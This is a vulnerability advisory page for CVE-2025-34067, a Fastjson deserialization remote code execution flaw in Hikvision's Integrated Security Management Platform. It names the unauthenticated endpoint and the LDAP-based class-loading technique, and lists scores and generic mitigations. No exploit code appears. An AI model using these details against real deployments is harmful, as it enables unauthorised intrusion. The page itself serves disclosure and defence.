CVE-2025-34067
Published: 02 July 2025
Summary
CVE-2025-34067 is a critical-severity Deserialization of Untrusted Data (CWE-502) vulnerability in S4E (inferred from references). Its CVSS base score is 10.0 (Critical).
Operationally, ranked in the top 7.5% of CVEs by exploit likelihood; it is not currently listed in the CISA KEV catalog; a public proof-of-concept is referenced.
Deeper analysis
CVE-2025-34067 is an unauthenticated remote code execution flaw in the applyCT component of the Hikvision Integrated Security Management Platform. The vulnerability stems from the component's use of a vulnerable Fastjson library version; the endpoint /bic/ssoService/v1/applyCT accepts and deserializes untrusted user input, enabling Fastjson's auto-type feature to load arbitrary Java classes referenced through an LDAP URL.
An attacker with network access can send a crafted request to the endpoint that triggers class loading and achieves arbitrary command execution on the underlying system. No authentication or user interaction is required, and the CVSS 4.0 score of 10.0 reflects the full impact across confidentiality, integrity, and availability.
Exploitation evidence was recorded by the Shadowserver Foundation on 2025-02-05 UTC. The EPSS score has remained flat at a peak of 0.0842 with no material increase since disclosure. Public references, including detailed write-ups on GitHub and advisories from VulnCheck and S4E, document the issue but do not specify vendor patches or configuration mitigations in the available sources.
EU & UK References
- 🇪🇺 ENISA EUVD: EUVD-2025-19719
Vulnerability details
An unauthenticated remote command execution vulnerability exists in the applyCT component of the Hikvision Integrated Security Management Platform due to the use of a vulnerable version of the Fastjson library. The endpoint /bic/ssoService/v1/applyCT deserializes untrusted user input, allowing an attacker…
more
to trigger Fastjson's auto-type feature to load arbitrary Java classes. By referencing a malicious class via an LDAP URL, an attacker can achieve remote code execution on the underlying system. Exploitation evidence was observed by the Shadowserver Foundation on 2025-02-05 UTC.
- CWE(s)
Related Threats
No named actor attribution yet. ATT&CK technique mapping in progress for this CVE.
Affected Assets
Mitigating Controls
Likely Mitigating Controls AI
Per-CVE control mapping for this CVE has not run yet; the list below is derived from the weakness types (CWEs) cited in the NVD entry.
Penetration testing supplies malicious serialized objects, detecting unsafe deserialization and supporting corrective actions.
Evaluation of untrusted data handling (deserialization testing) reveals unsafe processing, which the required remediation process addresses.
Untrusted serialized data can be deserialized and observed inside the chamber, blocking gadget-chain exploitation outside the sandbox.
Validates or rejects untrusted serialized data before deserialization occurs.
Identifies and blocks malicious code introduced through deserialization of untrusted data at system boundaries.
Integrity verification of serialized information can detect tampering before deserialization occurs.
Provenance of associated data allows detection of untrusted sources before deserialization or processing occurs.